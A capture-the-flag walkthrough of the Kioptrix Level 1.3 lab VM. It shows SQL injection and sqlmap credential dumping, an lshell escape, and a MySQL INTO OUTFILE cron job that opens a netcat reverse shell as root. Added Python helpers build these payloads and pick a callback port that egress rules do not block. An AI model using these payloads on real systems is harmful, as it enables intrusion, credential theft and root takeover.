published on in writeup
tags: kioptrix

Kioptrix Level 1.3

This is a walkthrough of how I completed the Kioptrix Level 1.3 challenge. The goal is to find the flag.

Nmap

# nmap -n -sV -A -p- 192.168.1.124

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2014-04-24T14:40:46-04:00
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

LigGoat Login

Visiting the web page takes you to a LigGoat login page.

I first tried admin:admin, which redirected me to checklogin.php with the error message “Wrong Username or Password”. I then attempted some SQLi to bypass the login. When I entered admin:' or '1'='1'-- I received a PHP warning instead: “Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28”.

That warning is the tell. mysql_num_rows() only complains like that when mysql_query() returned FALSE, i.e. the query failed, which means my quote and comment characters reached the database unescaped. It did not log me in because MySQL only treats -- as a comment when it is followed by whitespace; with the application's closing quote glued on as --' the trailing quote is left unterminated and the statement is a syntax error (a trailing space after --, or # instead, avoids that). Either way the password field is injectable, so to do the heavy lifting I used sqlmap.
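To make the difference between the failing payload and a working one concrete, here is an added example that is not code from the walkthrough or from the Kioptrix VM. It reconstructs the kind of string-concatenated query a checklogin.php like this one builds (the exact query on the box is unknown, so the template is a hypothetical), applies MySQL's comment rule to show which payloads leave an unterminated quote, and contrasts it with a parameterised login against a local SQLite stand-in seeded with the two rows dumped later in this writeup.

```python
import sqlite3

# Added example, not code from the walkthrough or from the Kioptrix VM.
# The query template below is a hypothetical reconstruction of what a
# concatenating checklogin.php builds; the table rows are the two
# credentials the walkthrough dumped, used here as constructed sample data.
SAMPLE_ROWS = [(1, "john", "MyNameIsJohn"), (2, "robert", "ADGAdsafdfwt4gadfga==")]


def build_login_query(username, password):
    """The vulnerable pattern: user input pasted straight into the SQL text."""
    return ("SELECT * FROM members WHERE username='" + username
            + "' AND password='" + password + "'")


def strip_mysql_comments(sql):
    """Drop the comment tail the way MySQL's lexer does.

    '#' opens a comment anywhere outside a string literal; '--' opens one
    only when the next character is whitespace.  Single quotes are tracked
    so markers inside a literal are ignored (backslash escapes are not
    modelled; the payloads here do not use them)."""
    out = []
    in_quote = False
    i = 0
    while i < len(sql):
        c = sql[i]
        if c == "'":
            in_quote = not in_quote
        elif not in_quote:
            if c == "#":
                break
            if sql.startswith("--", i) and i + 2 < len(sql) and sql[i + 2].isspace():
                break
        out.append(c)
        i += 1
    return "".join(out)


def diagnose(username, password):
    """Return 'syntax error' when the concatenated query ends up with an
    unterminated string literal (mysql_query() then returns FALSE and
    mysql_num_rows() emits the warning seen above), else 'parses'."""
    effective = strip_mysql_comments(build_login_query(username, password))
    return "syntax error" if effective.count("'") % 2 else "parses"


def make_db():
    """In-memory SQLite stand-in for the members.members table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def safe_login(conn, username, password):
    """Hardened form: bound parameters, so quotes and comment markers stay
    inside the string value and never reach the SQL parser."""
    row = conn.execute("SELECT id FROM members WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    for p in ("' or '1'='1'--", "' or '1'='1'-- ", "' or '1'='1'#"):
        print(repr(p), "->", diagnose("admin", p))
    print("safe_login with payload:", safe_login(make_db(), "admin", "' or '1'='1'-- "))
```

The first payload is the one from the page and comes back as a syntax error; the same payload with a trailing space, or with # in place of --, parses and the OR clause makes the WHERE true. Against the parameterised query none of them log in, because the whole string is compared as a password value.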

SQLMap

# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -p mypassword

This first attempt reported that the mypassword field was not injectable: at the default --level=1 --risk=1 sqlmap only tries a small set of payloads. So I dialed up the level and risk (risk 3 adds the OR-based boolean tests, which sqlmap keeps out of the default run because an OR condition injected into an UPDATE or DELETE can modify rows).

# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -p mypassword --level=5 --risk=3
POST parameter 'mypassword' seems to be 'OR boolean-based blind - WHERE or HAVING clause' injectable 
POST parameter 'mypassword' seems to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" --current-db --current-user --is-dba
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
current user:    'root@localhost'
current database:    'members'
current user is DBA:    True
# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" --dbs
[*] information_schema
[*] members
[*] mysql
# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -D members --tables
# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -D members -T members --dump
1  john  MyNameIsJohn   
2  robert  ADGAdsafdfwt4gadfga==
# sqlmap -u http://192.168.1.124/checklogin.php --data="myusername=admin&mypassword=1" -D mysql -T user --dump
(root passwords blank)

A few interesting bits of information there…

SSH

In the previous challenge, information I obtained from a database allowed me to SSH into the system, so I tried this again with john and robert. Both sets of credentials worked, but each user was dropped into a restricted shell of some description.

# ssh john@192.168.1.124
john@192.168.1.124's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

You can only run the commands shown above, and too many attempts to run unauthorised commands kicks you out (how rude). I wondered if I could get further help on individual commands by typing help <command>.

john:~$ help help
Limited Shell (lshell) limited help.
Cheers.

That was a stroke of luck. I went off to do a bit of research on lshell and found that older versions can be escaped: lshell checks the command name against its allow-list but does not sanitise the rest of the line, and because lshell is itself written in Python, the argument to an allowed command such as echo can be evaluated as Python code inside lshell's own process. I tried to leverage this to spawn a new bash shell outside the restrictions.

john:~$ echo __import__('os').system("/bin/bash")
john@Kioptrix4:~$

Another stroke of luck!

MySQL

I first made sure I could connect to MySQL as root, without a password.

john@Kioptrix4:~$ mysql -h localhost -u root -e "show databases;"
+--------------------+
| Database           |
+--------------------+
| information_schema | 
| members            | 
| mysql              | 
+--------------------+

Next I wanted to see if I could use MySQL to write to the file system, so I carried out a simple test.

john@Kioptrix4:~$ mysql -h localhost -u root -e "use mysql; select 0x7468697320697320612074657374 into outfile '/test';"

john@Kioptrix4:~$ cat /test
this is a test

john@Kioptrix4:~$ ls -l /test
-rw-rw-rw- 1 root root 15 2014-04-25 05:22 /test

This shows that I can write to the filesystem through MySQL, and more importantly that the file is created by root: the mysqld process itself is running as root rather than as the usual mysql user, and secure_file_priv is evidently not restricting INTO OUTFILE. Note the size too: 15 bytes for a 14-character string, because INTO OUTFILE appends a newline after the row. That is handy for the next step, since a crontab line has to end with a newline to be parsed.

Cron

I thought I could then use this to write a new job file into /etc/cron.d, to automate a netcat connection back to my IP. Since I can write as root, and cron.d entries carry their own user field, I can have the resulting shell run with root privileges.

First check where netcat is:

john@Kioptrix4:~$ whereis nc
nc: /bin/nc.traditional

Then write the file. The hex literal decodes to "* * * * * root /bin/nc.traditional 192.168.1.120 443 -e /bin/bash"; sending it as hex means the spaces, slashes and dashes never have to be quoted inside the SQL string:

john@Kioptrix4:~$ mysql -h localhost -u root -e "use mysql; select 0x2a202a202a202a202a20726f6f74202f62696e2f6e632e747261646974696f6e616c203139322e3136382e312e31323020343433202d65202f62696e2f62617368 into outfile '/etc/cron.d/totally-legitimate-cron';"
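Hand-encoding the hex is error-prone, so here is an added helper that is not code from the walkthrough or the Kioptrix VM. It builds the INTO OUTFILE statements used in the two steps above (the /test probe and the cron.d job) from plain text, reproduces the 15-byte result of the probe, and refuses bodies that INTO OUTFILE would mangle. The IP, port, netcat path and file paths are the ones used in this writeup.

```python
# Added example, not code from the walkthrough or the Kioptrix VM: build the
# hex-literal INTO OUTFILE statements used above from plain text, and check
# the payload before it goes to disk.  IP, port and paths are the ones the
# walkthrough used.


def hex_literal(data):
    """0x... literal: MySQL treats it as a binary string, so no quoting."""
    return "0x" + data.hex()


def outfile_safe(data):
    """True when INTO OUTFILE will write the bytes verbatim (plus its own
    trailing newline).  Under the default FIELDS ESCAPED BY '\\',
    TERMINATED BY '\\t' and LINES TERMINATED BY '\\n' settings, MySQL
    prefixes backslash, tab, newline and NUL with a backslash on output,
    so a body containing them lands on disk mangled.  For multi-line files
    use INTO DUMPFILE, which writes the row raw and adds no terminator."""
    return not any(bad in data for bad in (b"\\", b"\t", b"\n", b"\x00"))


def outfile_bytes(data):
    """What ends up on disk: the row plus the LINES TERMINATED BY newline,
    which is why the 14-character test string became a 15-byte /test."""
    return data + b"\n"


def outfile_statement(data, path):
    """SELECT <hex> INTO OUTFILE '<path>'; with the checks applied first."""
    if not outfile_safe(data):
        raise ValueError("body contains a character INTO OUTFILE would escape")
    if "'" in path or "\\" in path:
        raise ValueError("path must not need quoting")
    return "select %s into outfile '%s';" % (hex_literal(data), path)


def cron_line(attacker_ip, attacker_port, nc="/bin/nc.traditional", user="root"):
    """/etc/cron.d format: five time fields, the user, then the command.
    Every minute, as root, connect back and hand over a shell."""
    return "* * * * * %s %s %s %d -e /bin/bash" % (user, nc, attacker_ip, attacker_port)


def cron_line_ok(line):
    """Cheap sanity check on the cron.d layout before writing it as root."""
    fields = line.split()
    return (len(fields) >= 7
            and all(f == "*" or f[0].isdigit() for f in fields[:5])
            and fields[5][0].isalpha())


def mysql_command(statement, db="mysql"):
    """The full one-liner typed on the box (root, no password)."""
    return 'mysql -h localhost -u root -e "use %s; %s"' % (db, statement)


if __name__ == "__main__":
    line = cron_line("192.168.1.120", 443)
    assert cron_line_ok(line)
    print(mysql_command(outfile_statement(b"this is a test", "/test")))
    print(mysql_command(outfile_statement(line.encode(),
                                          "/etc/cron.d/totally-legitimate-cron")))
```

Run it and the second line printed is the exact command from the writeup, hex literal included. The outfile_safe check is the part worth keeping around: a one-line cron entry passes, but a multi-line script would not, and that is the moment to switch to INTO DUMPFILE and put the newline in the data yourself.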

Set up my listener, and…

# nc -lnvp 443
nc: listening on :: 443 ...
nc: listening on 0.0.0.0 443 ...
nc: connect to 192.168.1.120 443 from 192.168.1.124 58497

id
uid=0(root) gid=0(root) groups=0(root)

cat congrats.txt
Congratulations!
You've got root.

Epilogue

Getting the cron to work took a good amount of time - I thought I was getting the syntax incorrect. I checked the running processes and saw more than a few instances of netcat running, but the connections weren’t reaching me.

Changing the port to 443 fixed this and I got a connection.

In my root shell I checked the iptables rules, and there was a cheeky rule in there to block traffic on port 4444 (as well as a few others). It is the OUTPUT chain that matters for a reverse shell: the target's outbound connection to my port 4444 was being dropped before it left the box, whereas 443 is not on the list.

/sbin/iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       tcp  --  anywhere             anywhere            tcp dpt:4444 
DROP       tcp  --  anywhere             anywhere            tcp dpts:1337:x11 
DROP       tcp  --  anywhere             anywhere            tcp dpts:webmin:31337 
DROP       tcp  --  anywhere             anywhere            tcp dpt:webcache 
Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
DROP       tcp  --  anywhere             anywhere            tcp dpt:4444 
DROP       tcp  --  anywhere             anywhere            tcp dpts:1337:x11 
DROP       tcp  --  anywhere             anywhere            tcp dpts:webmin:31337 
DROP       tcp  --  anywhere             anywhere            tcp dpt:webcache 
DROP       tcp  --  anywhere             anywhere            tcp dpt:www 
DROP       tcp  --  anywhere             anywhere            tcp dpt:ftp
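Rather than guessing a second port next time, the listing can be turned into a check. The following is an added example, not code from the walkthrough: it parses the OUTPUT chain copied from the iptables -L output above, resolves the service names iptables printed (the standard /etc/services values, which is an assumption about the box; iptables -nL would print numbers directly), and reports which candidate callback ports would get out.

```python
import re

# Added example (not code from the walkthrough): turn the iptables -L
# listing above into a port check.  OUTPUT_CHAIN is the OUTPUT chain copied
# from that listing; it is the chain an outbound reverse shell has to pass.
OUTPUT_CHAIN = """\
Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination
DROP       tcp  --  anywhere             anywhere            tcp dpt:4444
DROP       tcp  --  anywhere             anywhere            tcp dpts:1337:x11
DROP       tcp  --  anywhere             anywhere            tcp dpts:webmin:31337
DROP       tcp  --  anywhere             anywhere            tcp dpt:webcache
DROP       tcp  --  anywhere             anywhere            tcp dpt:www
DROP       tcp  --  anywhere             anywhere            tcp dpt:ftp
"""

# Without -n, iptables prints service names from /etc/services.  These are
# the standard /etc/services assignments for the names in the listing; the
# box's own file was not checked, so treat them as an assumption.
SERVICES = {"x11": 6000, "webmin": 10000, "webcache": 8080, "www": 80, "ftp": 21}

# A DROP rule for tcp with a destination port or port range.
RULE_RE = re.compile(r"^DROP\s+tcp\b.*\bdpts?:(\S+)")


def port_number(token):
    return int(token) if token.isdigit() else SERVICES[token]


def dropped_ranges(listing):
    """(low, high) destination-port ranges the chain DROPs for TCP."""
    ranges = []
    for line in listing.splitlines():
        m = RULE_RE.match(line)
        if m:
            parts = m.group(1).split(":")      # "4444" or "1337:x11"
            ranges.append((port_number(parts[0]), port_number(parts[-1])))
    return ranges


def port_reachable(port, listing=OUTPUT_CHAIN):
    """Assumes the chain policy is ACCEPT, as in the listing, so anything
    that no DROP rule matches gets out."""
    return not any(lo <= port <= hi for lo, hi in dropped_ranges(listing))


def first_reachable(candidates, listing=OUTPUT_CHAIN):
    """First candidate callback port the OUTPUT chain would let through."""
    for port in candidates:
        if port_reachable(port, listing):
            return port
    return None


if __name__ == "__main__":
    print("dropped:", dropped_ranges(OUTPUT_CHAIN))
    print("4444 reachable:", port_reachable(4444))
    print("pick:", first_reachable([4444, 1337, 8080, 443]))
```

With this chain, 4444 is dropped outright, everything from 1337 to 6000 and from 10000 to 31337 is dropped by the two range rules, and 443 is the first of the usual candidates that survives, which matches what happened in practice.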